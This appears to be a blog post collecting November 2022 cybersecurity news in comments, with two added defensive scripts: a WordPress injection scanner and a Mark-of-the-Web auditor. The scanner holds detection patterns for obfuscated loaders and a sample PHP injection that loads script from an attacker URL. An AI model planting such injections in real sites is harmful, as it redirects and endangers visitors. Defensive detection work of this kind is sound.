Cyber security news November 2022

This posting is here to collect cyber security news in November 2022.

I post links to security vulnerability news in the comments of this article.

You are also free to post related links in the comments.

349 Comments

  1. Tomi Engdahl says:

    Mississippi election websites knocked out by DDoS attack https://therecord.media/mississippi-election-websites-knocked-out-by-ddos-attack/
    Several Mississippi state websites were knocked offline during today’s midterm election in what was the most significant digital disruption of the day, though more could be on the way as ballots are counted.

  2. Tomi Engdahl says:

    The Case of Cloud9 Chrome Botnet
    https://www.zimperium.com/blog/the-case-of-cloud9-chrome-botnet/
    The Zimperium zLabs team recently discovered a malicious browser extension, which not only steals the information available during the browser session but can also install malware on a user’s device and subsequently assume control of the entire device. In this blog, we will take a deeper look into the architecture and modus operandi of this malicious browser extension, originally called Cloud9, by the malware author.

  3. Tomi Engdahl says:

    Lenovo fixes flaws that can be used to disable UEFI Secure Boot https://www.bleepingcomputer.com/news/security/lenovo-fixes-flaws-that-can-be-used-to-disable-uefi-secure-boot/
    Lenovo has fixed two high-severity vulnerabilities impacting various ThinkBook, IdeaPad, and Yoga laptop models that could allow an attacker to deactivate UEFI Secure Boot.

  4. Tomi Engdahl says:

    No Cyberattacks Affected US Vote Counting, Officials Say
    https://www.securityweek.com/no-cyberattacks-affected-us-vote-counting-officials-say

    No instances of digital interference are known to have affected the counting of the midterm vote after a tense Election Day in which officials were closely monitoring domestic and foreign threats.

    A few state and local governments appeared to be hit by a relatively rudimentary form of cyberattack that periodically made public websites unreachable. But U.S. and local officials said Wednesday that none breached vote-counting infrastructure.

    “We have seen no evidence that any voting system deleted or lost votes, changed votes, or was any way compromised in any race in the country,” Jen Easterly, director of the U.S. Cybersecurity and Infrastructure Agency, said in a statement.

    CISA and other federal agencies had warned that safeguarding U.S. elections has become more complex than ever, with the most serious threats from domestic sources. Foreign adversaries such as Russia, China, and Iran have tried to meddle in individual campaigns and amplify false or misleading narratives on social media.

    The website of Mississippi’s secretary of state was down for part of Tuesday and there were other reports of sites becoming unreachable throughout the country, including in Champaign County, Illinois, and parts of Arkansas.

    They were all apparently hit with a “distributed denial of service,” in which a website is flooded with inauthentic traffic to cause it to crash. Federal and state officials said they could not say who was responsible for the Mississippi attack or other denial of service incidents, though a pro-Russia group had called on the social media platform Telegram for its followers to target the site.

    The site’s inaccessibility meant, for example, that residents could not use the site’s information about the location of voting precincts. DeLano said the secretary of state keeps a separate database for statewide voter registration information and that was not affected by the attack. Same-day election results are not posted on the Mississippi secretary of state’s site, so those also were not affected.

    In a statement, Secretary of State Michael Watson credited technology staff who “worked diligently to ensure that Mississippi’s election was secure, and through their hard work, we can confidently say our election system was not compromised.”

  5. Tomi Engdahl says:

    Microsoft Patches MotW Zero-Day Exploited for Malware Delivery
    https://www.securityweek.com/microsoft-patches-motw-zero-day-exploited-malware-delivery

    Microsoft’s latest Patch Tuesday updates address six zero-day vulnerabilities, including one related to the Mark-of-the-Web (MotW) security feature that has been exploited by cybercriminals to deliver malware.

    Windows adds the MotW to files coming from untrusted locations, including browser downloads and email attachments. When trying to open files with the MotW, users are warned about the potential risks or, in the case of Office, macros are blocked to prevent malicious code execution.

    However, there are ways to bypass MotW defenses. Researcher Will Dormann has identified three different MotW bypass methods and informed Microsoft about them over the summer, but patches were only rolled out now, and only for two of the vulnerabilities. The techniques work against all or most versions of Windows.

    One of the methods involves delivering the malicious file inside a ZIP archive. If the malicious file is extracted, it will have the MotW and the user gets a warning. However, if the file is executed directly from within the archive, Windows runs it without any warning. This issue is tracked as CVE-2022-41049 and it has been patched by Microsoft with its November Patch Tuesday updates.

    Another MotW bypass method involves making the malicious file ‘read only’ and placing it inside a ZIP archive. When the file is extracted, Windows attempts to set the MotW, but fails, which means the file will be executed by Windows without any warning.

    This vulnerability is tracked as CVE-2022-41091 and it has been fixed by Microsoft on Tuesday. This is the method that Microsoft has confirmed as being exploited in the wild.

  6. Tomi Engdahl says:

    Gaping Authentication Bypass Holes in VMWare Workspace One
    https://www.securityweek.com/gaping-authentication-bypass-holes-vmware-workspace-one

    Virtualization technology giant VMware joined the Patch Tuesday train this week to deliver urgent security patches to its VMWare Workspace One product.

    The company published an urgent bulletin (VMSA-2022-0028) with barebones details on at least five documented security vulnerabilities that expose VMWare Workspace One users to authentication bypass attacks.

    VMWare slapped a critical-severity rating on the bulletin and warned that three of the patched flaws are marked with a CVSS severity score of 9.8/10.

    The vulnerabilities — CVE-2022-31685, CVE-2022-31686, CVE-2022-31687, CVE-2022-31688, CVE-2022-31689 — were found and fixed in the VMware Workspace ONE Assist utility and can be exploited to defeat authentication mechanisms.

    “A malicious actor with network access to Workspace One Assist may be able to obtain administrative access without the need to authenticate to the application,” VMWare warned multiple times in the advisory.

    In the past, security defects in the VMWare Workspace One product have been targeted by attackers in the wild, including nation-state APT actors and ransomware criminals.

  7. Tomi Engdahl says:

    iPhone collects and shares your data even if you forbid it
    https://etn.fi/index.php/13-news/14224-iphone-keraeae-ja-jakaa-dataasi-vaikka-kieltaeisit-sen

    Smartphones are known to collect all kinds of data, most of which is needed for apps to work optimally. A new study, however, reveals that Apple's iPhone collects user data even when the feature is switched off in the settings.

    Mysk founder Tommy Mysk explains his research on Twitter. According to him, the App Store continuously collects real-time data on its users' activity. Apple receives information on which apps are searched for, which ads are seen, and precise details of the device in use.

  8. Tomi Engdahl says:

    Chrome received an important fix 5 days ago that not everyone has got yet – here is what to do
    Chrome users should check their browser version manually without delay.
    https://www.is.fi/digitoday/tietoturva/art-2000009172139.html

    Google has released an update for the Chrome browser that fixes a serious vulnerability which may already have been used in attacks. Google says in its blog that it is aware of reports that an exploit for the hole is in circulation.

    The fix updates Chrome to version 107.0.5304.87/.88 on Windows and to version 107.0.5304.87 on Mac and Linux. Although Google published the fix last Thursday, it may not have reached many users yet.

    In principle, the update may not even be available yet. Google says the fix will reach users "over the coming days/weeks". This is Google's standard phrase even when urgent holes are being fixed.

    https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html

    The Stable channel has been updated to 107.0.5304.87 for Mac and Linux and 107.0.5304.87/.88 for Windows, which will roll out over the coming days/weeks.

  9. Tomi Engdahl says:

    Ernesto Van der Sar / TorrentFreak:
    Italian court upholds a ban against Cloudflare resolving DNS queries for three torrent sites, after Cloudflare appealed that the ban would impact users globally

    Court Upholds Piracy Blocking Order Against Cloudflare’s 1.1.1.1 DNS Resolver
    https://torrentfreak.com/court-upholds-piracy-blocking-order-against-cloudflares-1-1-1-1-dns-resolver-221109/

    The Court of Rome has confirmed that Cloudflare must block three torrent sites through its public 1.1.1.1 DNS resolver. The blockade was requested by several major record labels and arrives after Italy’s telecoms regulator ordered local ISPs to block the sites. Cloudflare is not pleased with the order and previously noted that such broad measures set a dangerous precedent.

    Website blocking has become an increasingly common anti-piracy tool around the globe.

    In dozens of countries, ISPs have been ordered by courts to block pirate sites, usually on copyright grounds. More recently, neutral DNS providers have been targeted as well.

    Earlier this year, an Italian court ordered Cloudflare to block three torrent sites on its public 1.1.1.1 DNS resolver. The order applies to kickasstorrents.to, limetorrents.pro, and ilcorsaronero.pro, three domains that are already blocked by ISPs in Italy following an order from local regulator AGCOM.

    Cloudflare Appeals DNS Blocking Order

    Disappointed by the ruling, Cloudflare filed an appeal at the Court of Milan. The internet infrastructure company doesn’t object to blocking requests that target its customers’ websites but believes that interfering with its DNS resolver is problematic, as those measures are not easy to restrict geographically.

    “Because such a block would apply globally to all users of the resolver, regardless of where they are located, it would affect end users outside of the blocking government’s jurisdiction,” Cloudflare recently said.

    “We therefore evaluate any government requests or court orders to block content through a globally available public recursive resolver as requests or orders to block content globally.”

    At the court of appeal, Cloudflare argued that DNS blocking is an ineffective measure that can be easily bypassed, with a VPN for example. In addition, it contested that it is subject to the jurisdiction of an Italian court.

    Court Dismisses Appeal

    Cloudflare’s defenses failed to gain traction in court and its appeal was dismissed. DNS blocking may not be a perfect solution, but that doesn’t mean that Cloudflare can’t be compelled to intervene.

    The dismissal is a win for Sony Music, Warner Music, and Universal, the companies behind the complaint. It’s also seen as a clear victory by Enzo Mazza, CEO of the Italian music industry group FIMI.

    “This is an important decision for Italy and beyond. Cloudflare, as well as other intermediaries providing similar services, should step up their efforts in preventing users access to illegal websites which were ordered to be blocked,” Mazza says.

    Global music industry group IFPI agrees.

    A Precedent

    This is the first time that Cloudflare has been ordered to make pirate sites unavailable through its public DNS resolver 1.1.1.1. This is an important expansion since many Italians switched to public DNS resolvers to bypass ISP blocking measures. With the court order, rightsholders can remove this shortcut.

    While this type of order is new in Italy, a similar blocking injunction was requested in Germany last year. A local court ordered DNS provider Quad9 to block a pirate site but the decision is still under appeal.

  10. Tomi Engdahl says:

    Fingerprints make Bad Passwords — they’re not secret, they are irrevocable, and they’re unhashable making them difficult to store securely. https://hackaday.com/2015/11/10/your-unhashable-fingerprints-secure-nothing/

  11. Tomi Engdahl says:

    Laptop flaws could help malware survive a hard disk wipe https://www.tripwire.com/state-of-security/laptop-flaws-could-help-malware-survive-hard-disk-wipe
    PC manufacturer Lenovo has been forced to push out a security update to more than two dozen of its laptop models, following the discovery of high severity vulnerabilities that could be exploited by malicious hackers. Security researchers at ESET discovered flaws in 25 of its laptop models – including IdeaPads, Slims, and ThinkBooks – that could be used to disable the UEFI Secure Boot process. That matters because Secure Boot, as its name suggests, is a feature that allows a PC’s firmware to be “locked down” as a defence against rootkits, ensuring that only trusted cryptographically-signed code can be run at bootup.
    A vulnerability in the laptops’ Secure Boot process could open opportunities for cybercriminals to install malicious firmware onto a device that would survive a hard drive being wiped or an operating system being reinstalled.

  12. Tomi Engdahl says:

    Worok hackers hide new malware in PNGs using steganography https://www.bleepingcomputer.com/news/security/worok-hackers-hide-new-malware-in-pngs-using-steganography/
    A threat group tracked as Worok hides malware within PNG images to infect victims’ machines with information-stealing malware without raising alarms. This has been confirmed by researchers at Avast, who built upon the findings of ESET, the first to spot and report on Worok’s activity in early September 2022. ESET warned that Worok targeted high-profile victims, including government entities in the Middle East, Southeast Asia, and South Africa, but their visibility into the group’s attack chain was limited. Avast’s report is based on additional artifacts the company captured from Worok attacks, confirming ESET’s assumptions about the nature of the PNG files and adding new information on the type of malware payloads and the data exfiltration method.

  13. Tomi Engdahl says:

    Russian LockBit ransomware operator arrested in Canada https://www.bleepingcomputer.com/news/security/russian-lockbit-ransomware-operator-arrested-in-canada/
    Europol has announced today the arrest of a Russian national linked to LockBit ransomware attacks targeting critical infrastructure organizations and high-profile companies worldwide. The suspect was arrested in Ontario, Canada, last month following an investigation led by the French National Gendarmerie with the help of Europol’s European Cybercrime Centre (EC3), the FBI, and the Canadian Royal Canadian Mounted Police (RCMP). “A 33-year old Russian national, the suspect is believed to have deployed the LockBit ransomware to carry out attacks against critical infrastructure and large industrial groups across the world.”

  14. Tomi Engdahl says:

    Kaspersky to kill its VPN service in Russia next week https://www.bleepingcomputer.com/news/security/kaspersky-to-kill-its-vpn-service-in-russia-next-week/
    Kaspersky is stopping the operation and sales of its VPN product, Kaspersky Secure Connection, in the Russian Federation, with the free version to be suspended as early as November 15, 2022. As the Moscow-based company informed on its Russian blog earlier this week, the shutdown of the VPN service will be staged, so that impact on customers remains minimal. Purchases of the paid version of Kaspersky Secure Connection will remain available on both the official website and mobile app stores until December 2022. Customers with active subscriptions will continue to enjoy the product’s VPN service until the end of the paid period, which cannot go beyond the end of 2023 (one-year subscription).

  15. Tomi Engdahl says:

    Apple Patches Remote Code Execution Flaws in iOS, macOS
    https://www.securityweek.com/apple-patches-remote-code-execution-flaws-ios-macos

    Apple on Tuesday released out-of-band patches for iOS and macOS, to address two arbitrary code execution vulnerabilities in the libxml2 library.

    Written in the C programming language and originally developed for the Gnome project, libxml2 is a software library for parsing XML documents.

    Tracked as CVE-2022-40303 and CVE-2022-40304, the two vulnerabilities could lead to remote code execution. Apple has credited Google Project Zero security researchers for both issues.

    “A remote user may be able to cause unexpected app termination or arbitrary code execution,” Apple notes for both security flaws.

  16. Tomi Engdahl says:

    Ransomware Gang Offers to Sell Files Stolen From Continental for $50 Million
    https://www.securityweek.com/ransomware-gang-offers-sell-files-stolen-continental-50-million

    A notorious ransomware group is offering to sell files allegedly stolen from German car parts giant Continental for $50 million.

    Continental reported in August that it had been targeted in a cyberattack that resulted in hackers accessing some of its systems. The company said at the time that the attack had been “averted” and that business activities were not affected.

    The LockBit ransomware group recently revealed on its leak website that it was behind the attack on Continental and threatened to make public information stolen from the company.

  17. Tomi Engdahl says:

    Analysis of Russian Cyberspy Attacks Leads to Discovery of Windows Vulnerability
    https://www.securityweek.com/analysis-russian-cyberspy-attacks-leads-discovery-windows-vulnerability

    An analysis of the numerous LDAP queries that Russian cyberespionage group APT29 had made to the Active Directory system has led to the discovery of a vulnerability in Windows’ ‘credential roaming’ functionality.

    Also referred to as Cozy Bear, the Dukes, and Yttrium, APT29 is a Russian cyberespionage group likely sponsored by the Russian Foreign Intelligence Service (SVR).

    The group is believed to be responsible for multiple high-profile attacks, including the 2016 targeting of the Democratic National Committee (DNC), a 2018 attempt to infiltrate the DNC, and the 2020 SolarWinds attack.

    In a May 2022 report, Mandiant revealed that the group had been launching phishing attacks against diplomatic organizations in Europe, the Americas, and Asia, in an attempt to infect them with new malware families.

    Now, the Google subsidiary reveals that its investigation into an APT29 incident has led to the discovery of CVE-2022-30170 (CVSS score of 7.3), a vulnerability potentially allowing attackers to gain remote code execution.

    Microsoft released patches for CVE-2022-30170 on the September 2022 Patch Tuesday, describing the issue as an elevation of privilege bug.

    “An attacker who successfully exploited the vulnerability could gain remote interactive logon rights to a machine where the victim’s account would not normally hold such privilege,” the tech giant notes.

  18. Tomi Engdahl says:

    ABB Oil and Gas Flow Computer Hack Can Prevent Utilities From Billing Customers
    https://www.securityweek.com/abb-oil-and-gas-flow-computer-hack-can-prevent-utilities-billing-customers

    Oil and gas flow computers and remote controllers made by Swiss industrial technology firm ABB are affected by a serious vulnerability that could allow hackers to cause disruptions and prevent utilities from billing their customers, according to industrial cybersecurity firm Claroty.

    Utilities rely on flow computers to calculate oil and gas flow rates and volume. These devices, which are often used in the electric power sector, play an important role in process safety, as well as billing.

    Researchers at Claroty showed how an attacker with access to a targeted flow computer can bypass authentication using a brute-force attack, and then exploit a path traversal vulnerability to read the device’s shadow password file to obtain its root account password. The same vulnerability can be used to modify the SSH configuration file to enable password authentication and allow the attacker to access the device with root privileges.

    Claroty reported its findings to ABB, which announced the release of firmware patches for affected products in July. The path traversal vulnerability is tracked as CVE-2022-0902 and it has been assigned a ‘high severity’ rating.

    Claroty has published a blog post detailing its research, as well as a video showing how an attacker could hack a device.

    An Oil and Gas Weak Spot: Flow Computers
    https://claroty.com/team82/research/an-oil-and-gas-weak-spot-flow-computers

  19. Tomi Engdahl says:

    Not worth travelling to France. There you can get 5 years in prison if you do not hand over your phone's PIN code to the police.

    French Court rules that refusing to disclose a mobile passcode to law enforcement is a criminal offence
    https://www.fairtrials.org/articles/news/french-court-rules-that-refusing-to-disclose-a-mobile-passcode-to-law-enforcement-is-a-criminal-offence/

    The French Court of Cassation has ruled that people who are suspected or accused of a crime are obliged to reveal the passcode of their mobile phone to the investigative authorities. The Court found that a mobile phone passcode can be considered a “secret decryption agreement of a means of cryptology” (convention de déchiffrement d’un moyen de cryptologie). Refusing to hand over the passcode of a mobile phone is punishable by a fine of up to 270,000 EUR or three years’ imprisonment. This punishment is increased to a fine of 450,000 EUR or five years’ imprisonment where revealing a passcode and giving access to the content of the mobile device could have prevented a criminal offence or reduced its impact.

  20. Tomi Engdahl says:

    Russian hackers stole the health data of nearly 10 million people in Australia – the prime minister among them https://www.is.fi/digitoday/tietoturva/art-2000009194594.html

  21. Tomi Engdahl says:

    ”Donald Trump” and ”Jesus” misbehaving and sowing confusion – complete chaos on Twitter https://www.is.fi/digitoday/art-2000009194955.html

  22. Tomi Engdahl says:

    TransUnion breached, consumers’ financial information exposed
    https://appleinsider.com/articles/22/11/10/transunion-data-breach-exposes-consumers-financial-information

    TransUnion has sent letters to consumers alerting them to a recent data breach that compromised a wide array of their personal and financial information.

    On Monday, TransUnion reported a data breach with the Massachusetts Attorney General. It currently isn’t known how many people were affected in the breach.

    According to JDSupra, TransUnion said that the breach resulted in names, full Social Security numbers, financial account numbers, and complete driver’s license numbers being compromised.

    TransUnion is one of the largest consumer credit reporting agencies, collating information from more than a billion users globally and 200 million files in the United States alone.

    https://www.jdsupra.com/legalnews/transunion-llc-confirms-recent-data-6828319/

    On November 7, 2022, TransUnion LLC reported a data breach with the Massachusetts Attorney General after information in the company’s possession was subject to unauthorized access. According to TransUnion, the breach resulted in the names, Social Security numbers, financial account numbers and driver’s license numbers being compromised. Recently, TransUnion sent out data breach letters to all affected parties, informing them of the incident and what they can do to protect themselves from identity theft and other frauds.

    While the total number of people affected by the TransUnion data breach remains unknown at this point, the company has stated that it possesses “200 million files profiling nearly every credit-active consumer in the United States.” As we’ve noted in previous posts, the information leaked in a data breach can be used to commit identity theft and other frauds against victims of a breach. Thus, it is imperative that anyone who receives a data breach notification letter or email from TransUnion takes the necessary steps to protect themselves by mitigating these risks. Aggrieved consumers may also pursue a data breach lawsuit against the company if evidence emerges that it was negligent in the storage of their data.

  23. Tomi Engdahl says:

    Fortinet addressed 16 vulnerabilities in some of the company’s products; six flaws received a ‘high’ severity rating
    https://securityaffairs.co/wordpress/138021/security/fortinet-nov-2022-flaws.html

  24. Tomi Engdahl says:

    15,000 sites hacked for massive Google SEO poisoning campaign
    https://www.bleepingcomputer.com/news/security/15-000-sites-hacked-for-massive-google-seo-poisoning-campaign/

    Hackers are conducting a massive black hat search engine optimization (SEO) campaign by compromising almost 15,000 websites to redirect visitors to fake Q&A discussion forums.

    The attacks were first spotted by Sucuri, who says that each compromised site contains approximately 20,000 files used as part of the search engine spam campaign, with most of the sites being WordPress.

    The researchers believe the threat actors’ goal is to generate enough indexed pages to increase the fake Q&A sites’ authority and thus rank better in search engines.

    Targeting WordPress sites
    Sucuri reports that the hackers are modifying WordPress PHP files, such as ‘wp-singup.php’, ‘wp-cron.php’, ‘wp-settings.php’, ‘wp-mail.php’, and ‘wp-blog-header.php’, to inject the redirects to the fake Q&A discussion forums.

    The infected or injected files contain malicious code that checks if the website visitors are logged in to WordPress, and if they’re not, redirects them to the https://ois.is/images/logo-6.png URL.

    However, browsers will not be sent an image from this URL but will instead have JavaScript loaded that redirects users to a Google search click URL that redirects users to the promoted Q&A site.

    The exclusion of logged-in users, as well as those standing at ‘wp-login.php,’ aims to avoid redirecting an administrator of the site, which would result in the raising of suspicion and the cleaning of the compromised site.

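A defender-side check for the campaign described in the comment above. This is an added example, not Sucuri's or BleepingComputer's code: it scans WordPress PHP files for the behaviour the article describes (a logged-in check gating a redirect, a "script" whose source claims to be a PNG, and the redirect URL named in the article). The injected sample in the block is constructed for the test and only imitates that pattern.

```python
"""Scan WordPress PHP files for the injected-redirect pattern described by Sucuri.

Added example, not the project's or the article's own code. Indicators that
come from the article: the redirect URL and the list of modified core files.
Everything else (rule names, the sample snippets) is constructed here.
"""
import re
from pathlib import Path
from typing import Dict, List

# Core files the article names as modified in the campaign
SUSPECT_CORE_FILES = {
    "wp-singup.php", "wp-cron.php", "wp-settings.php",
    "wp-mail.php", "wp-blog-header.php",
}

# Indicator from the article: the redirect target disguised as an image
KNOWN_REDIRECT_URL = "ois.is/images/logo-6.png"

RULES: Dict[str, "re.Pattern[str]"] = {
    # exact indicator from the article
    "known-redirect-url": re.compile(re.escape(KNOWN_REDIRECT_URL), re.I),
    # a logged-in check followed (within a short window) by a redirect or
    # script injection: the "skip the administrator" behaviour described above
    "logged-in-gated-redirect": re.compile(
        r"wordpress_logged_in[\s\S]{0,400}?"
        r"(?:header\s*\(\s*['\"]Location:|<script[^>]+src\s*=)",
        re.I,
    ),
    # a script element whose source pretends to be an image file
    "script-src-image": re.compile(
        r"<script[^>]+src\s*=\s*['\"][^'\"]+\.(?:png|jpe?g|gif)['\"]", re.I
    ),
    # generic obfuscated loader, common in injected core files
    "obfuscated-eval": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I
    ),
}


def scan_source(source: str) -> List[str]:
    """Return the names of every rule that matches one PHP file's contents."""
    return [name for name, rx in RULES.items() if rx.search(source)]


def scan_tree(root: Path) -> Dict[str, List[str]]:
    """Scan all .php files under root; report matched rules per relative path.

    A hit in one of the core files named in the article is additionally
    tagged "named-core-file" so it sorts to the top of a triage list.
    """
    hits: Dict[str, List[str]] = {}
    for path in root.rglob("*.php"):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip, do not abort the whole scan
        matched = scan_source(text)
        if matched:
            if path.name in SUSPECT_CORE_FILES:
                matched.append("named-core-file")
            hits[str(path.relative_to(root))] = matched
    return hits


# Constructed sample imitating the described injection (not a real payload):
# non-logged-in visitors off the login page get a "PNG" loaded as script.
INJECTED_SAMPLE = """<?php
if (!isset($_COOKIE['wordpress_logged_in_x'])
    && strpos($_SERVER['REQUEST_URI'], 'wp-login.php') === false) {
    echo '<script src="https://ois.is/images/logo-6.png"></script>';
}
"""

# Constructed benign bootstrap for comparison.
CLEAN_SAMPLE = "<?php\n/** WordPress bootstrap */\nrequire_once __DIR__ . '/wp-load.php';\n"


if __name__ == "__main__":
    import sys
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    if root is None:
        print("injected sample ->", scan_source(INJECTED_SAMPLE))
        print("clean sample    ->", scan_source(CLEAN_SAMPLE))
    else:
        for rel, rules in sorted(scan_tree(root).items()):
            print(f"{rel}: {', '.join(rules)}")
```

Run it with the WordPress document root as the first argument; a hit on a named core file is a strong signal, while "obfuscated-eval" alone deserves a manual look because some plugins legitimately pack code.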
  25. Tomi Engdahl says:

    Patches for 6 0-days under active exploit are now available from Microsoft
    Exchange, Windows, and a bunch of other Microsoft software all affected.
    https://arstechnica.com/information-technology/2022/11/patches-for-6-zero-days-under-active-exploit-are-now-available-from-microsoft/

  26. Tomi Engdahl says:

    Experian tool exposed partial Social Security numbers, putting customers at risk
    https://www.cyberscoop.com/experian-kbv-ssn-nist-identity-theft/

  27. Tomi Engdahl says:

    FBI warns: there is a group of devices where an attack endangers lives https://www.is.fi/digitoday/tietoturva/art-2000009195270.html

    The FBI fears, for example, cyberattacks targeting pacemakers.

  28. Tomi Engdahl says:

    THE US federal police, the FBI, warned (pdf) that unpatched medical devices enable cyberattacks. By medical devices the FBI means, for example, insulin pumps, certain kinds of defibrillators, pacemakers, and intrathecal pumps for pain relief.

  29. Tomi Engdahl says:

    New BadBazaar Android malware linked to Chinese cyberspies https://www.bleepingcomputer.com/news/security/new-badbazaar-android-malware-linked-to-chinese-cyberspies/
    A previously undocumented Android spyware tool named BadBazaar has been discovered targeting ethnic and religious minorities in China, most notably the Uyghurs in Xinjiang. The new spyware was originally discovered by MalwareHunterTeam and linked to Bahamut in VirusTotal detections. After further analysis by Lookout, the malware was found to be new spyware using the same infrastructure seen in 2020 campaigns against Uyghurs by the state-backed hacking group APT15 (aka “Pitty Tiger”). Additionally, Lookout observed a second campaign using new variants of Moonshine, a spyware discovered by CitizenLab in 2019 while deployed against Tibetan groups.

  30. Tomi Engdahl says:

    Microsoft fixes Windows zero-day bug exploited to push malware https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-zero-day-bug-exploited-to-push-malware/
    As part of the November Patch Tuesday updates, Microsoft fixed numerous vulnerabilities that allowed threat actors to craft files that can bypass the Mark of the Web security feature. Included in the updates was an unexpected fix for a bug that threat actors commonly abuse in phishing campaigns. According to Bill Demirkapi, an engineer in Microsoft MSRC’s Vulnerability and Mitigations team, a bug was fixed that prevented the MoTW flag from propagating to files inside an ISO disk image. For some time, threat actors have been distributing ISO disk images as attachments in phishing campaigns to infect targets with malware.

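The MotW bypasses in comment 5 (files run from inside a ZIP, read-only files extracted without the mark) and the ISO propagation bug above share one symptom: a downloaded file that should carry the Zone.Identifier stream does not. This added example, not from either article, audits a folder for that symptom. It reads the NTFS alternate data stream through the "path:Zone.Identifier" syntax on Windows; the parser and the classification logic are plain Python and run anywhere. The stream sample and the verdict labels are my own.

```python
"""Audit a directory for files missing the Mark-of-the-Web (MotW).

Added example. On NTFS the MotW is an alternate data stream named
Zone.Identifier holding an INI-style [ZoneTransfer] section; ZoneId=3 is
the Internet zone. Files that arrived from a download but carry no mark
(for example because they were extracted read-only from a ZIP, or came
out of a mounted ISO before the fix) get no SmartScreen/Office protection,
so an auditor wants them listed.
"""
import os
import stat
import sys
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, List, Optional

URLZONE_INTERNET = 3  # ZoneId that Windows writes for Internet downloads


def parse_zone_identifier(text: str) -> Dict[str, str]:
    """Parse Zone.Identifier stream content into a dict of its keys.

    Constructed example of the stream format:
        [ZoneTransfer]
        ZoneId=3
        ReferrerUrl=https://example.test/
        HostUrl=https://example.test/archive.zip
    """
    values: Dict[str, str] = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "ZoneTransfer" and "=" in line:
            key, _, val = line.partition("=")
            values[key.strip()] = val.strip()
    return values


def zone_id_of(zone: Optional[Dict[str, str]]) -> Optional[int]:
    """Numeric ZoneId from a parsed stream, or None if absent/malformed."""
    if zone is None or not zone.get("ZoneId", "").isdigit():
        return None
    return int(zone["ZoneId"])


def read_motw(path: Path) -> Optional[Dict[str, str]]:
    """Return the parsed MotW for path, or None when no mark is present."""
    if sys.platform != "win32":
        return None  # the ADS only exists on NTFS; nothing to read elsewhere
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8", errors="replace") as fh:
            return parse_zone_identifier(fh.read())
    except OSError:
        return None  # stream absent (no mark) or unreadable


def classify(zone: Optional[Dict[str, str]], read_only: bool) -> str:
    """Verdict labels (constructed for this example):
    marked-untrusted     mark present, Internet or Restricted zone: protections apply
    marked-trusted-zone  mark present but Local/Intranet/Trusted zone
    unmarked-readonly    no mark on a read-only file: the CVE-2022-41091 symptom
    unmarked             no mark at all: treat as untrusted content
    """
    zid = zone_id_of(zone)
    if zone is not None:
        return "marked-untrusted" if zid is not None and zid >= URLZONE_INTERNET else "marked-trusted-zone"
    return "unmarked-readonly" if read_only else "unmarked"


@dataclass
class Finding:
    path: str
    read_only: bool
    zone_id: Optional[int]
    verdict: str


def is_read_only(st: os.stat_result) -> bool:
    """Read-only attribute on Windows, else the owner write bit being clear."""
    attrs = getattr(st, "st_file_attributes", 0)
    ro_flag = getattr(stat, "FILE_ATTRIBUTE_READONLY", 0)
    return bool(attrs & ro_flag) or not (st.st_mode & stat.S_IWUSR)


def audit_dir(root: Path) -> List[Finding]:
    """Classify every regular file under root."""
    findings: List[Finding] = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            p = Path(dirpath, name)
            st = p.stat()
            zone = read_motw(p)
            ro = is_read_only(st)
            findings.append(Finding(str(p), ro, zone_id_of(zone), classify(zone, ro)))
    return findings


if __name__ == "__main__":
    target = Path(sys.argv[1] if len(sys.argv) > 1 else ".")
    for f in audit_dir(target):
        if f.verdict.startswith("unmarked"):
            print(f"{f.verdict:18} {f.path}")
```

Point it at a Downloads folder after extracting an archive; every "unmarked-readonly" line is a file Windows will open without the usual warning.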
  31. Tomi Engdahl says:

    Canadian food retail giant Sobeys hit by Black Basta ransomware https://www.bleepingcomputer.com/news/security/canadian-food-retail-giant-sobeys-hit-by-black-basta-ransomware/
    Grocery stores and pharmacies belonging to Canadian food retail giant Sobeys have been experiencing IT systems issues since last weekend.
    Sobeys is one of two national grocery retailers in Canada, with 134,000 employees servicing a network of 1,500 stores in all ten provinces under multiple retail banners, including Sobeys, Safeway, IGA, Foodland, FreshCo, Thrifty Foods, and Lawtons Drugs. In a press release published Monday, Sobeys’ parent company Empire revealed that while its grocery stores were still open, some services were impacted by this company-wide IT issue. Based on ransom notes and negotiation chats BleepingComputer has seen, the attackers deployed Black Basta ransomware payloads to encrypt systems on Sobeys’ network.

  32. Tomi Engdahl says:

    Police warn of scam messages that appear to come from a telecom operator: “Must be deleted immediately”
    https://www.is.fi/digitoday/tietoturva/art-2000009194783.html
    SOUTHWEST FINLAND police warn of scam messages sent in the name of the authorities. Messages have arrived impersonating at least the tax administration and the enforcement authority. The messages demand money and include a payment link. What makes the scam credible is that the messages appear to come in the name of a telecom operator. The sender of a text message is easy to forge, but it is nevertheless a strong device for making the scam more convincing. On receiving a message of this kind, it should be deleted immediately. The links in the message should not be opened. There is no need to file a police report if you have not opened the link in the message or paid anything, the police advise.
